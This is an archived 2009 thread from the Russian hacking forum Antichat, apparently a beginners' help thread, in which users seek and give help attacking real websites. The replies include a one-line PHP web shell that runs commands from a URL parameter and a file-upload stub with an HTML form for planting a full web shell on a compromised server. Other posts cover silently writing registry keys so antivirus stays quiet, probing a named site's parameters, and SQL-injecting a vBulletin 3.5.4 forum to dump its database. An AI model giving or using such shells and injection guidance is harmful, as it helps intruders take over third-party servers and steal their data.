ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
26.01.2009, 18:18
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
https://forum.antichat.ru/showpost.php?p=198446&postcount=3
|
|
|
26.01.2009, 18:25
|
|
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789
Репутация:
0
|
|
Сообщение от j0ker13
2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"
чётат так не юзаеься ) куда это так надо написать?
а если заюзать вот так, но только без оповещения и без удаления в конце. как лучше? антивирус молчит на такие действия 
WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.Popup("Создаем раздел"); WSHShell.RegWrite("HKCU\\MyRegKey\\", "Primer"); WSHShell.Popup("Создаем строковый параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\String", 1); WSHShell.Popup("Создаем параметр DWORD"); WSHShell.RegWrite("HKCU\\MyRegKey\\DWORD", 2, "REG_DWORD"); WSHShell.Popup("Создаем двоичный параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\Binary", 3, "REG_BINARY"); WSHShell.Popup("Удаляем все параметры"); WSHShell.RegDelete("HKCU\\MyRegKey\\String"); WSHShell.RegDelete("HKCU\\MyRegKey\\DWORD"); WSHShell.RegDelete("HKCU\\MyRegKey\\Binary"); WSHShell.Popup("Удаляем раздел"); WSHShell.RegDelete("HKCU\\MyRegKey\\");
Последний раз редактировалось Neponomat; 26.01.2009 в 18:42..
|
|
|
|
26.01.2009, 22:33
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме:
3885269
Репутация:
1158
|
|
Видели когда нибудь такие ссылки:
http://wallenberg.ru/component/option,com_contact/task,view/contact_id,1/Itemid,94/
??? Если изменяю, id на -999 допустим, открывается стандартная какая то страница. Почему?
|
|
|
|
26.01.2009, 22:39
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от procedure
Видели когда нибудь такие ссылки:
http://wallenberg.ru/component/option,com_contact/task,view/contact_id,1/Itemid,94/
??? Если изменяю, id на -999 допустим, открывается стандартная какая то страница. Почему?
модреврайт
>> Почему?
Мб потому что значение которое ты указываешь не существует?
|
|
|
|
27.01.2009, 08:34
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Значит затёрся на одном месте.
Есть в скрипте выполнение php команд.
Хочу залить шелл в одну директорию, права на неё: drwxrwxrwx
Системные команды выполняются, но ни через WGET, ни через copy не заливается шелл... Типа команда выполненна без ошибок, но итог 404
Инклуд тоже не пашет...
Что тут можно предпринять?
|
|
|
|
27.01.2009, 10:44
|
|
Познающий
Регистрация: 01.08.2008
Сообщений: 42
Провел на форуме:
670601
Репутация:
50
|
|
в чем проблема заюзать другую качалку вроде lynx
|
|
|
|
27.01.2009, 11:12
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Nightmarе, а что тебе мешает выполнить команду:
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
Пробуй писать полные пути...
|
|
|
|
27.01.2009, 11:21
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
groundhog, по сути у него это и есть)
Nightmarе, можно создать файл, как сказал groundhog, только его содержимое будет примерно таким:
PHP код:
<?php file_put_contents('путь до файла', $_POST['file']); ?>
Далее, создаешь на локале файл:
Код HTML:
<form action='http://site.com/путь_до_получившегося_файла' method='post'>
<textarea name='file'></textarea>
<input type='submit'/>
</form>
Кидаешь в текстарею код шелла, жмешь баттон, и получаешь веб-шел) |
|
|
|
27.01.2009, 20:54
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме:
25855
Репутация:
0
|
|
Комрады подскажите!!!
Нужно похекать сайт на vBulletin 3.5.4
На одном из форумов видел SQL INJ - из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'.
Таким образом можно сделать дамп базы данных.
Как должен будет выглядеть запрос?
Мне для начала нужно заняться подборкой полей?
Просто Инъекциями я начал заниматься недавно, в голове полная каша...
помогите разобраться...
|
|
|
|
27.01.2009, 21:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Мне для начала нужно заняться подборкой полей?
ага, только перед этим еще убедится, что по данному урлу именно sql-inj, а не просто раскрытие пути и т.п.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
